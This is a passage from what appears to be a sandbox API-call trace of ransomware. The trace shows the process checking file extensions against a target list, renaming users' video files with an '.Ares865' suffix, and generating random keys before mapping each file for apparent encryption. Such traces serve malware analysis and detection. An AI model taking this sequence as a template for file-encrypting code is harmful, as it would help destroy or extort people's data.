lpString2=".ini") returned 1 [0091.696] lstrlenW (lpString=".sys") returned 4 [0091.696] lstrcmpiW (lpString1="imuT3vD5fx4.mkv", lpString2=".sys") returned 1 [0091.696] lstrlenW (lpString="imuT3vD5fx4.mkv") returned 15 [0091.696] lstrlenW (lpString="bak") returned 3 [0091.696] lstrcmpiW (lpString1="mkv", lpString2="bak") returned 1 [0091.696] lstrlenW (lpString="ba_") returned 3 [0091.696] lstrcmpiW (lpString1="mkv", lpString2="ba_") returned 1 [0091.696] lstrlenW (lpString="dbb") returned 3 [0091.696] lstrcmpiW (lpString1="mkv", lpString2="dbb") returned 1 [0091.696] lstrlenW (lpString="vmdk") returned 4 [0091.696] lstrcmpiW (lpString1=".mkv", lpString2="vmdk") returned -1 [0091.696] lstrlenW (lpString="rar") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="rar") returned -1 [0091.697] lstrlenW (lpString="zip") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="zip") returned -1 [0091.697] lstrlenW (lpString="tgz") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="tgz") returned -1 [0091.697] lstrlenW (lpString="vbox") returned 4 [0091.697] lstrcmpiW (lpString1=".mkv", lpString2="vbox") returned -1 [0091.697] lstrlenW (lpString="vdi") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="vdi") returned -1 [0091.697] lstrlenW (lpString="vhd") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="vhd") returned -1 [0091.697] lstrlenW (lpString="vhdx") returned 4 [0091.697] lstrcmpiW (lpString1=".mkv", lpString2="vhdx") returned -1 [0091.697] lstrlenW (lpString="avhd") returned 4 [0091.697] lstrcmpiW (lpString1=".mkv", lpString2="avhd") returned -1 [0091.697] lstrlenW (lpString="db") returned 2 [0091.697] lstrcmpiW (lpString1="kv", lpString2="db") returned 1 [0091.697] lstrlenW (lpString="db2") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="db2") returned 1 [0091.697] lstrlenW (lpString="db3") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="db3") returned 1 [0091.697] lstrlenW (lpString="dbf") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="dbf") returned 1 [0091.697] lstrlenW (lpString="mdf") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="mdf") returned 1 [0091.697] lstrlenW (lpString="mdb") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="mdb") returned 1 [0091.697] lstrlenW (lpString="sql") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="sql") returned -1 [0091.697] lstrlenW (lpString="sqlite") returned 6 [0091.697] lstrcmpiW (lpString1="x4.mkv", lpString2="sqlite") returned 1 [0091.697] lstrlenW (lpString="sqlite3") returned 7 [0091.697] lstrcmpiW (lpString1="fx4.mkv", lpString2="sqlite3") returned -1 [0091.697] lstrlenW (lpString="sqlitedb") returned 8 [0091.697] lstrcmpiW (lpString1="5fx4.mkv", lpString2="sqlitedb") returned -1 [0091.697] lstrlenW (lpString="xml") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="xml") returned -1 [0091.697] lstrlenW (lpString="$er") returned 3 [0091.697] lstrcmpiW (lpString1="mkv", lpString2="$er") returned 1 [0091.698] lstrlenW (lpString="4dd") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="4dd") returned 1 [0091.698] lstrlenW (lpString="4dl") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="4dl") returned 1 [0091.698] lstrlenW (lpString="^^^") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="^^^") returned 1 [0091.698] lstrlenW (lpString="abs") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="abs") returned 1 [0091.698] lstrlenW (lpString="abx") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="abx") returned 1 [0091.698] lstrlenW (lpString="accdb") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accdb") returned -1 [0091.698] lstrlenW (lpString="accdc") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accdc") returned -1 [0091.698] lstrlenW (lpString="accde") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accde") returned -1 [0091.698] lstrlenW (lpString="accdr") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accdr") returned -1 [0091.698] lstrlenW (lpString="accdt") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accdt") returned -1 [0091.698] lstrlenW (lpString="accdw") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accdw") returned -1 [0091.698] lstrlenW (lpString="accft") returned 5 [0091.698] lstrcmpiW (lpString1="4.mkv", lpString2="accft") returned -1 [0091.698] lstrlenW (lpString="adb") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0091.698] lstrlenW (lpString="adb") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0091.698] lstrlenW (lpString="ade") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="ade") returned 1 [0091.698] lstrlenW (lpString="adf") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="adf") returned 1 [0091.698] lstrlenW (lpString="adn") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="adn") returned 1 [0091.698] lstrlenW (lpString="adp") returned 3 [0091.698] lstrcmpiW (lpString1="mkv", lpString2="adp") returned 1 [0091.698] lstrlenW (lpString="alf") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="alf") returned 1 [0091.699] lstrlenW (lpString="ask") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="ask") returned 1 [0091.699] lstrlenW (lpString="btr") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="btr") returned 1 [0091.699] lstrlenW (lpString="cat") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="cat") returned 1 [0091.699] lstrlenW (lpString="cdb") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="cdb") returned 1 [0091.699] lstrlenW (lpString="ckp") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="ckp") returned 1 [0091.699] lstrlenW (lpString="cma") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="cma") returned 1 [0091.699] lstrlenW (lpString="cpd") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="cpd") returned 1 [0091.699] lstrlenW (lpString="dacpac") returned 6 [0091.699] lstrcmpiW (lpString1="x4.mkv", lpString2="dacpac") returned 1 [0091.699] lstrlenW (lpString="dad") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="dad") returned 1 [0091.699] lstrlenW (lpString="dadiagrams") returned 10 [0091.699] lstrcmpiW (lpString1="vD5fx4.mkv", lpString2="dadiagrams") returned 1 [0091.699] lstrlenW (lpString="daschema") returned 8 [0091.699] lstrcmpiW (lpString1="5fx4.mkv", lpString2="daschema") returned -1 [0091.699] lstrlenW (lpString="db-journal") returned 10 [0091.699] lstrcmpiW (lpString1="vD5fx4.mkv", lpString2="db-journal") returned 1 [0091.699] lstrlenW (lpString="db-shm") returned 6 [0091.699] lstrcmpiW (lpString1="x4.mkv", lpString2="db-shm") returned 1 [0091.699] lstrlenW (lpString="db-wal") returned 6 [0091.699] lstrcmpiW (lpString1="x4.mkv", lpString2="db-wal") returned 1 [0091.699] lstrlenW (lpString="dbc") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="dbc") returned 1 [0091.699] lstrlenW (lpString="dbs") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="dbs") returned 1 [0091.699] lstrlenW (lpString="dbt") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="dbt") returned 1 [0091.699] lstrlenW (lpString="dbv") returned 3 [0091.699] lstrcmpiW (lpString1="mkv", lpString2="dbv") returned 1 [0091.699] lstrlenW (lpString="dbx") returned 3 [0091.700] lstrcmpiW (lpString1="mkv", lpString2="dbx") returned 1 [0091.700] lstrlenW (lpString="dcb") returned 3 [0091.700] lstrcmpiW (lpString1="mkv", lpString2="dcb") returned 1 [0091.700] lstrcmpiW (lpString1="mkv", lpString2="dct") returned 1 [0091.700] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imuT3vD5fx4.mkv.Ares865") returned 60 [0091.700] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imuT3vD5fx4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imut3vd5fx4.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imuT3vD5fx4.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imut3vd5fx4.mkv.ares865"), dwFlags=0x1) returned 1 [0091.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imuT3vD5fx4.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imut3vd5fx4.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3477) returned 1 [0091.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.701] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.702] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.702] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10a0, lpName=0x0) returned 0x15c [0091.702] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a0) returned 0x190000 [0091.703] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.703] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.703] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.705] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IncK3x9u8pb-Q.mkv.Ares865") returned 62 [0091.705] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IncK3x9u8pb-Q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\inck3x9u8pb-q.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IncK3x9u8pb-Q.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\inck3x9u8pb-q.mkv.ares865"), dwFlags=0x1) returned 1 [0091.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IncK3x9u8pb-Q.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\inck3x9u8pb-q.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.708] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84237) returned 1 [0091.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.708] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.709] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.709] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.709] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14c10, lpName=0x0) returned 0x15c [0091.710] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14c10) returned 0x190000 [0091.712] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.713] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.713] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.716] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k_5fkmoa1m4Vxp0m8F.swf.Ares865") returned 67 [0091.716] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k_5fkmoa1m4Vxp0m8F.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k_5fkmoa1m4vxp0m8f.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k_5fkmoa1m4Vxp0m8F.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k_5fkmoa1m4vxp0m8f.swf.ares865"), dwFlags=0x1) returned 1 [0091.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\k_5fkmoa1m4Vxp0m8F.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\k_5fkmoa1m4vxp0m8f.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.717] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22399) returned 1 [0091.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.717] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.718] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.718] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.718] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a80, lpName=0x0) returned 0x15c [0091.718] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a80) returned 0x190000 [0091.719] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.719] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.719] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.721] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zHO vHz.flv.Ares865") returned 56 [0091.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zHO vHz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zho vhz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zHO vHz.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zho vhz.flv.ares865"), dwFlags=0x1) returned 1 [0091.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\zHO vHz.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zho vhz.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.722] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6369) returned 1 [0091.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.723] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1bf0, lpName=0x0) returned 0x15c [0091.723] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1bf0) returned 0x190000 [0091.724] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.724] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.724] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw" [0091.726] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\1n55sxKLdAdwKRUxf.mkv.Ares865") returned 81 [0091.726] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\1n55sxKLdAdwKRUxf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\1n55sxkldadwkruxf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\1n55sxKLdAdwKRUxf.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\1n55sxkldadwkruxf.mkv.ares865"), dwFlags=0x1) returned 1 [0091.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\1n55sxKLdAdwKRUxf.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\1n55sxkldadwkruxf.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93689) returned 1 [0091.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.728] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.728] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.728] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.728] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17100, lpName=0x0) returned 0x15c [0091.729] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17100) returned 0x190000 [0091.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.736] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\96l iO92vy.mkv.Ares865") returned 74 [0091.736] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\96l iO92vy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\96l io92vy.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\96l iO92vy.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\96l io92vy.mkv.ares865"), dwFlags=0x1) returned 1 [0091.736] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\96l iO92vy.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\96l io92vy.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26944) returned 1 [0091.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.738] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c40, lpName=0x0) returned 0x15c [0091.738] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c40) returned 0x190000 [0091.739] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.740] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.740] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.743] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\go9UIpQFJPYM_-R_WLS_.avi.Ares865") returned 84 [0091.743] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\go9UIpQFJPYM_-R_WLS_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\go9uipqfjpym_-r_wls_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\go9UIpQFJPYM_-R_WLS_.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\go9uipqfjpym_-r_wls_.avi.ares865"), dwFlags=0x1) returned 1 [0091.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\go9UIpQFJPYM_-R_WLS_.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\go9uipqfjpym_-r_wls_.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92964) returned 1 [0091.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.744] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.778] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.778] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.778] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 